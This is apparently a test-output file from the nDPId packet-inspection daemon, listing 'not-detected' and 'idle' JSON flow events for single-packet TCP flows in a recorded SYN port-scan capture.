-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
